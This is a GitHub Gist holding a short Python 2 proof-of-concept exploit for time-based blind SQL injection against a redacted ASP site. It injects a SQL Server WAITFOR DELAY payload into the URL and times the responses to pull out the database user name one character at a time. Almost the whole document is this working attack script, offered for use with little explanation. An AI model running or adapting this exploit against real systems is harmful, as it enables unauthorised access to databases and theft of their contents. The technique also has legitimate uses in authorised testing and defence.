Created
August 21, 2017 13:11
-
-
Save bl4de/28db5356328eac68e301b6d3e068c0c4 to your computer and use it in GitHub Desktop.
exploit to extract data with SQLi
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# XXXX.asp time-based SQL injection PoC exploit | |
# Rafal 'bl4de' Janicki | |
import requests | |
# base url | |
base_url = 'http://REDACTED :/' | |
# delay in case of TRUE returned by query | |
delayed = '00:00:08' | |
charset = 'ABCDEFGHIJKLMNOPQRSTUWVXYZabcdefghijklmnopqrstuwvxyz 1234567890-_@#$~' | |
# QUERY to execute | |
query = "';IF (user_name() LIKE '{}%25') WAITFOR DELAY '{}'-- " | |
# here goes payload | |
payload = '' | |
def get_headers(): | |
return { | |
'Cookie': 'XXXX' | |
'Host': 'XXXXX', | |
'Pragma': 'no-cache', | |
'Upgrade-Insecure-Requests': 1 | |
} | |
def make_request(url): | |
resp = requests.get(url, headers=get_headers()) | |
return resp | |
def measure_response_time(resp): | |
return resp.elapsed.total_seconds() | |
print "[+] Query: {}".format(query.format('', delayed)) | |
print "[+] URL called: {}".format(base_url + query) | |
print "[+] delay in time-based IF set to: {}".format(delayed) | |
# we extract 10 characters in one script run | |
# if string is longest that 10 chars, this script can be executed with | |
# initial payload set to already found string, so the first iteration will | |
# look for 11th char and so on; or just increase max in range() call | |
for i in range(0, 10): | |
for c in charset: | |
url = base_url + query.format(payload + c, delayed) | |
resp = make_request(url) | |
if measure_response_time(resp) > 8: | |
payload = payload + c | |
print "[+] found character: {} - current string is {}".format(c, payload) | |
break | |
print "[+] final: {}".format(payload) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment